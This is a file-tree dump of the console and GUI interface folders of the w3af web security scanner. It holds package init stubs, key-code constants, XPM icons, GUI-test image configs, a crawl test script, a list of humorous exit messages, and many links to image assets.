__author__ = 'pedro' 2 | -------------------------------------------------------------------------------- /w3af/core/ui/console/__init__.py: -------------------------------------------------------------------------------- 1 | try: 2 | _('blah') 3 | except: 4 | import __builtin__ 5 | __builtin__.__dict__['_'] = lambda x: x 6 | 7 | 8 | def setUpPackage(): 9 | import __builtin__ 10 | __builtin__.__dict__['_'] = lambda x: x 11 | -------------------------------------------------------------------------------- /w3af/core/ui/console/auto_update/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/console/auto_update/__init__.py -------------------------------------------------------------------------------- /w3af/core/ui/console/exitmessages.txt: -------------------------------------------------------------------------------- 1 | Bye. 2 | Liked it? Contribute with some lines of code! 3 | Liked it? Sponsor the project! 4 | w3af, better than the regular script kiddie. 5 | GPL inside. 6 | got shell? 7 | spawned a remote shell today? 8 | May the brute force be with you. 9 | Donations are accepted via ethereum at 0xb1B56F04E6cc5F4ACcB19678959800824DA8DE82 10 | -------------------------------------------------------------------------------- /w3af/core/ui/console/io/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/console/io/__init__.py -------------------------------------------------------------------------------- /w3af/core/ui/console/io/common.py: -------------------------------------------------------------------------------- 1 | 2 | KEY_UP = '\x1B[A' 3 | KEY_DOWN = '\x1B[B' 4 | KEY_RIGHT = '\x1B[C' 5 | KEY_LEFT = '\x1B[D' 6 | 7 | KEY_HOME = '^A' 8 | KEY_END = '^E' 9 | 10 | KEY_BACKSPACE = '\x7F' 11 | -------------------------------------------------------------------------------- /w3af/core/ui/console/tests/__init__.py: -------------------------------------------------------------------------------- 1 | try: 2 | _('blah') 3 | except: 4 | import __builtin__ 5 | __builtin__.__dict__['_'] = lambda x: x 6 | 7 | 8 | def setUpPackage(): 9 | import __builtin__ 10 | __builtin__.__dict__['_'] = lambda x: x 11 | -------------------------------------------------------------------------------- /w3af/core/ui/console/tests/data/spider_long.w3af: -------------------------------------------------------------------------------- 1 | # webspider 2 | 3 | plugins 4 | output console 5 | output config console 6 | set verbose False 7 | back 8 | 9 | crawl web_spider 10 | crawl config web_spider 11 | set only_forward True 12 | back 13 | back 14 | 15 | target 16 | set target %(moth)s 17 | back 18 | 19 | start 20 | 21 | exit 22 | -------------------------------------------------------------------------------- /w3af/core/ui/gui/auto_update/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/gui/auto_update/__init__.py -------------------------------------------------------------------------------- /w3af/core/ui/gui/common/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/gui/common/__init__.py -------------------------------------------------------------------------------- /w3af/core/ui/gui/comparator/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/gui/comparator/__init__.py -------------------------------------------------------------------------------- /w3af/core/ui/gui/comparator/pixmaps/button_apply0.xpm: -------------------------------------------------------------------------------- 1 | /* XPM */ 2 | static char * button_apply_xpm[] = { 3 | "16 12 3 1", 4 | " c None", 5 | ". c #000000", 6 | "+ c #FFFFFF", 7 | " ", 8 | " ... ", 9 | " ... ", 10 | " ... ", 11 | " .... ", 12 | " .............. ", 13 | " ...............", 14 | " .............. ", 15 | " .... ", 16 | " ... ", 17 | " ... ", 18 | " ... "}; 19 | -------------------------------------------------------------------------------- /w3af/core/ui/gui/comparator/pixmaps/button_delete.xpm: -------------------------------------------------------------------------------- 1 | /* XPM */ 2 | static char * button_delete_xpm[] = { 3 | "16 12 2 1", 4 | ". c black", 5 | " c None", 6 | " ", 7 | " .... .... ", 8 | " .... .... ", 9 | " .... .... ", 10 | " ........ ", 11 | " ...... ", 12 | " .... ", 13 | " ...... ", 14 | " ........ ", 15 | " .... .... ", 16 | " .... .... ", 17 | " .... .... " 18 | }; 19 | -------------------------------------------------------------------------------- /w3af/core/ui/gui/data/cluster_data.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/gui/data/cluster_data.png -------------------------------------------------------------------------------- /w3af/core/ui/gui/data/icons/16/gtk-execute.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/gui/data/icons/16/gtk-execute.png -------------------------------------------------------------------------------- /w3af/core/ui/gui/data/information.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/gui/data/information.png -------------------------------------------------------------------------------- /w3af/core/ui/gui/data/missing-image.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/gui/data/missing-image.png -------------------------------------------------------------------------------- /w3af/core/ui/gui/data/request-body.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/gui/data/request-body.png -------------------------------------------------------------------------------- /w3af/core/ui/gui/data/request-headers.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/gui/data/request-headers.png -------------------------------------------------------------------------------- /w3af/core/ui/gui/data/response-body.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/gui/data/response-body.png -------------------------------------------------------------------------------- /w3af/core/ui/gui/data/response-headers.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/gui/data/response-headers.png -------------------------------------------------------------------------------- /w3af/core/ui/gui/data/shell.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/gui/data/shell.png -------------------------------------------------------------------------------- /w3af/core/ui/gui/data/splash.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/gui/data/splash.png -------------------------------------------------------------------------------- /w3af/core/ui/gui/data/throbber_animat.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/gui/data/throbber_animat.gif -------------------------------------------------------------------------------- /w3af/core/ui/gui/data/throbber_static.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/gui/data/throbber_static.gif -------------------------------------------------------------------------------- /w3af/core/ui/gui/data/vulnerability.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/gui/data/vulnerability.png -------------------------------------------------------------------------------- /w3af/core/ui/gui/data/vulnerability_h.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/gui/data/vulnerability_h.png -------------------------------------------------------------------------------- /w3af/core/ui/gui/data/vulnerability_l.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/gui/data/vulnerability_l.png -------------------------------------------------------------------------------- /w3af/core/ui/gui/data/vulnerability_m.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/gui/data/vulnerability_m.png -------------------------------------------------------------------------------- /w3af/core/ui/gui/data/w3af_gtkrc: -------------------------------------------------------------------------------- 1 | gtk-theme-name = "Raleigh" 2 | gtk-button-images = 1 3 | 4 | -------------------------------------------------------------------------------- /w3af/core/ui/gui/data/w3af_icon.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/gui/data/w3af_icon.png -------------------------------------------------------------------------------- /w3af/core/ui/gui/data/w3af_logo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/gui/data/w3af_logo.png -------------------------------------------------------------------------------- /w3af/core/ui/gui/data/warning-black-animated.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/gui/data/warning-black-animated.gif -------------------------------------------------------------------------------- /w3af/core/ui/gui/data/wizard_frame.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/gui/data/wizard_frame.png -------------------------------------------------------------------------------- /w3af/core/ui/gui/dependency_check/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/gui/dependency_check/__init__.py -------------------------------------------------------------------------------- /w3af/core/ui/gui/exception_handling/__init__.py: -------------------------------------------------------------------------------- 1 | try: 2 | _('blah') 3 | except: 4 | import __builtin__ 5 | __builtin__.__dict__['_'] = lambda x: x 6 | 7 | 8 | def setUpPackage(): 9 | import __builtin__ 10 | __builtin__.__dict__['_'] = lambda x: x 11 | -------------------------------------------------------------------------------- /w3af/core/ui/gui/kb/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/gui/kb/__init__.py -------------------------------------------------------------------------------- /w3af/core/ui/gui/misc/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/gui/misc/__init__.py -------------------------------------------------------------------------------- /w3af/core/ui/gui/output/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/gui/output/__init__.py -------------------------------------------------------------------------------- /w3af/core/ui/gui/rrviews/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/gui/rrviews/__init__.py -------------------------------------------------------------------------------- /w3af/core/ui/gui/speed/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/gui/speed/__init__.py -------------------------------------------------------------------------------- /w3af/core/ui/gui/speed/arrow.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/gui/speed/arrow.png -------------------------------------------------------------------------------- /w3af/core/ui/gui/speed/speedometer.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/gui/speed/speedometer.png -------------------------------------------------------------------------------- /w3af/core/ui/gui/tabs/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/gui/tabs/__init__.py -------------------------------------------------------------------------------- /w3af/core/ui/gui/tabs/exploit/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/gui/tabs/exploit/__init__.py -------------------------------------------------------------------------------- /w3af/core/ui/gui/tabs/log/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/gui/tabs/log/__init__.py -------------------------------------------------------------------------------- /w3af/core/ui/gui/tests/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/gui/tests/__init__.py -------------------------------------------------------------------------------- /w3af/core/ui/gui/tools/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/gui/tools/__init__.py -------------------------------------------------------------------------------- /w3af/core/ui/gui/tools/helpers/__init__.py: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /w3af/core/ui/gui/user_help/__init__.py: -------------------------------------------------------------------------------- 1 | __author__ = 'pablo' 2 | -------------------------------------------------------------------------------- /w3af/core/ui/tests/__init__.py: -------------------------------------------------------------------------------- 1 | try: 2 | _('blah') 3 | except: 4 | import __builtin__ 5 | __builtin__.__dict__['_'] = lambda x: x 6 | 7 | 8 | def setUpPackage(): 9 | import __builtin__ 10 | __builtin__.__dict__['_'] = lambda x: x 11 | -------------------------------------------------------------------------------- /w3af/core/ui/tests/gui/__init__.py: -------------------------------------------------------------------------------- 1 | import os 2 | 3 | GUI_TEST_ROOT_PATH = os.path.dirname(os.path.realpath(__file__)) 4 | -------------------------------------------------------------------------------- /w3af/core/ui/tests/gui/auto_update/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/tests/gui/auto_update/__init__.py -------------------------------------------------------------------------------- /w3af/core/ui/tests/gui/disclaimer_accept/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/tests/gui/disclaimer_accept/__init__.py -------------------------------------------------------------------------------- /w3af/core/ui/tests/gui/disclaimer_accept/images/accept_terms_conditions.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/tests/gui/disclaimer_accept/images/accept_terms_conditions.png -------------------------------------------------------------------------------- /w3af/core/ui/tests/gui/disclaimer_accept/images/simple_no.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/tests/gui/disclaimer_accept/images/simple_no.png -------------------------------------------------------------------------------- /w3af/core/ui/tests/gui/disclaimer_accept/images/simple_yes.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/tests/gui/disclaimer_accept/images/simple_yes.png -------------------------------------------------------------------------------- /w3af/core/ui/tests/gui/disclaimer_accept/images/xpresser.ini: -------------------------------------------------------------------------------- 1 | [image simple_no] 2 | filename = simple_no.png 3 | similarity = 0.8 4 | 5 | [image simple_yes] 6 | filename = simple_yes.png 7 | similarity = 0.8 8 | -------------------------------------------------------------------------------- /w3af/core/ui/tests/gui/encode_decode/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/tests/gui/encode_decode/__init__.py -------------------------------------------------------------------------------- /w3af/core/ui/tests/gui/encode_decode/images/bottom_text_input.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/tests/gui/encode_decode/images/bottom_text_input.png -------------------------------------------------------------------------------- /w3af/core/ui/tests/gui/encode_decode/images/decode.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/tests/gui/encode_decode/images/decode.png -------------------------------------------------------------------------------- /w3af/core/ui/tests/gui/encode_decode/images/decode_hola_mundo_result.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/tests/gui/encode_decode/images/decode_hola_mundo_result.png -------------------------------------------------------------------------------- /w3af/core/ui/tests/gui/encode_decode/images/drop_down.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/tests/gui/encode_decode/images/drop_down.png -------------------------------------------------------------------------------- /w3af/core/ui/tests/gui/encode_decode/images/encode.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/tests/gui/encode_decode/images/encode.png -------------------------------------------------------------------------------- /w3af/core/ui/tests/gui/encode_decode/images/encode_me_result.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/tests/gui/encode_decode/images/encode_me_result.png -------------------------------------------------------------------------------- /w3af/core/ui/tests/gui/encode_decode/images/md5_for_encode-me.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/tests/gui/encode_decode/images/md5_for_encode-me.png -------------------------------------------------------------------------------- /w3af/core/ui/tests/gui/encode_decode/images/md5_hash.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/tests/gui/encode_decode/images/md5_hash.png -------------------------------------------------------------------------------- /w3af/core/ui/tests/gui/encode_decode/images/top_text_input.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/tests/gui/encode_decode/images/top_text_input.png -------------------------------------------------------------------------------- /w3af/core/ui/tests/gui/encode_decode/images/xpresser.ini: -------------------------------------------------------------------------------- 1 | 2 | 3 | -------------------------------------------------------------------------------- /w3af/core/ui/tests/gui/exploit/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/tests/gui/exploit/__init__.py -------------------------------------------------------------------------------- /w3af/core/ui/tests/gui/exploit/images/audit_plugin_checkbox.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/tests/gui/exploit/images/audit_plugin_checkbox.png -------------------------------------------------------------------------------- /w3af/core/ui/tests/gui/exploit/images/context_menu_exploit_until_first.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/tests/gui/exploit/images/context_menu_exploit_until_first.png -------------------------------------------------------------------------------- /w3af/core/ui/tests/gui/exploit/images/exploit_tab.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/tests/gui/exploit/images/exploit_tab.png -------------------------------------------------------------------------------- /w3af/core/ui/tests/gui/exploit/images/generated_shell.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/tests/gui/exploit/images/generated_shell.png -------------------------------------------------------------------------------- /w3af/core/ui/tests/gui/exploit/images/log_tab_enabled.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/tests/gui/exploit/images/log_tab_enabled.png -------------------------------------------------------------------------------- /w3af/core/ui/tests/gui/exploit/images/multiple_exploit.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/tests/gui/exploit/images/multiple_exploit.png -------------------------------------------------------------------------------- /w3af/core/ui/tests/gui/exploit/images/ok.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/tests/gui/exploit/images/ok.png -------------------------------------------------------------------------------- /w3af/core/ui/tests/gui/exploit/images/shell_inst.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/tests/gui/exploit/images/shell_inst.png -------------------------------------------------------------------------------- /w3af/core/ui/tests/gui/exploit/images/shell_window_title.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/tests/gui/exploit/images/shell_window_title.png -------------------------------------------------------------------------------- /w3af/core/ui/tests/gui/exploit/images/sql_mysql.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/tests/gui/exploit/images/sql_mysql.png -------------------------------------------------------------------------------- /w3af/core/ui/tests/gui/exploit/images/sqlmap.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/tests/gui/exploit/images/sqlmap.png -------------------------------------------------------------------------------- /w3af/core/ui/tests/gui/exploit/images/wordpress.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/tests/gui/exploit/images/wordpress.png -------------------------------------------------------------------------------- /w3af/core/ui/tests/gui/exploit_from_template/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/tests/gui/exploit_from_template/__init__.py -------------------------------------------------------------------------------- /w3af/core/ui/tests/gui/exploit_from_template/images/add.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/tests/gui/exploit_from_template/images/add.png -------------------------------------------------------------------------------- /w3af/core/ui/tests/gui/exploit_from_template/images/add_new_vuln.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/tests/gui/exploit_from_template/images/add_new_vuln.png -------------------------------------------------------------------------------- /w3af/core/ui/tests/gui/exploit_from_template/images/add_new_vuln_title.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/tests/gui/exploit_from_template/images/add_new_vuln_title.png -------------------------------------------------------------------------------- /w3af/core/ui/tests/gui/exploit_from_template/images/close.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/tests/gui/exploit_from_template/images/close.png -------------------------------------------------------------------------------- /w3af/core/ui/tests/gui/exploit_from_template/images/data.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/tests/gui/exploit_from_template/images/data.png -------------------------------------------------------------------------------- /w3af/core/ui/tests/gui/exploit_from_template/images/exploit_all.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/tests/gui/exploit_from_template/images/exploit_all.png -------------------------------------------------------------------------------- /w3af/core/ui/tests/gui/exploit_from_template/images/multiple_exploit.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/tests/gui/exploit_from_template/images/multiple_exploit.png -------------------------------------------------------------------------------- /w3af/core/ui/tests/gui/exploit_from_template/images/ok.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/tests/gui/exploit_from_template/images/ok.png -------------------------------------------------------------------------------- /w3af/core/ui/tests/gui/exploit_from_template/images/os_commanding_combo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/tests/gui/exploit_from_template/images/os_commanding_combo.png -------------------------------------------------------------------------------- /w3af/core/ui/tests/gui/exploit_from_template/images/os_commanding_exploit.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/tests/gui/exploit_from_template/images/os_commanding_exploit.png -------------------------------------------------------------------------------- /w3af/core/ui/tests/gui/exploit_from_template/images/os_commanding_shell.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/tests/gui/exploit_from_template/images/os_commanding_shell.png -------------------------------------------------------------------------------- /w3af/core/ui/tests/gui/exploit_from_template/images/shell_window_title.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/tests/gui/exploit_from_template/images/shell_window_title.png -------------------------------------------------------------------------------- /w3af/core/ui/tests/gui/exploit_from_template/images/store_in_kb.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/tests/gui/exploit_from_template/images/store_in_kb.png -------------------------------------------------------------------------------- /w3af/core/ui/tests/gui/exploit_from_template/images/target_url.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/tests/gui/exploit_from_template/images/target_url.png -------------------------------------------------------------------------------- /w3af/core/ui/tests/gui/exploit_from_template/images/vuln_params_title.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/tests/gui/exploit_from_template/images/vuln_params_title.png -------------------------------------------------------------------------------- /w3af/core/ui/tests/gui/exploit_from_template/images/vulnerable_parameter.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/tests/gui/exploit_from_template/images/vulnerable_parameter.png -------------------------------------------------------------------------------- /w3af/core/ui/tests/gui/exploit_from_template/images/xpresser.ini: -------------------------------------------------------------------------------- 1 | [image data] 2 | filename = data.png 3 | focus_delta = +100 +0 4 | 5 | [image vulnerable_parameter] 6 | filename = vulnerable_parameter.png 7 | focus_delta = +100 +0 8 | -------------------------------------------------------------------------------- /w3af/core/ui/tests/gui/export_request/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/tests/gui/export_request/__init__.py -------------------------------------------------------------------------------- /w3af/core/ui/tests/gui/export_request/images/drop_down_export.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/tests/gui/export_request/images/drop_down_export.png -------------------------------------------------------------------------------- /w3af/core/ui/tests/gui/export_request/images/export.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/tests/gui/export_request/images/export.png -------------------------------------------------------------------------------- /w3af/core/ui/tests/gui/export_request/images/http_request_text.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/tests/gui/export_request/images/http_request_text.png -------------------------------------------------------------------------------- /w3af/core/ui/tests/gui/export_request/images/python_code.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/tests/gui/export_request/images/python_code.png -------------------------------------------------------------------------------- /w3af/core/ui/tests/gui/export_request/images/python_export.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/tests/gui/export_request/images/python_export.png -------------------------------------------------------------------------------- /w3af/core/ui/tests/gui/export_request/images/save_request_as.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/w3af/core/ui/tests/gui/export_request/images/save_request_as.png 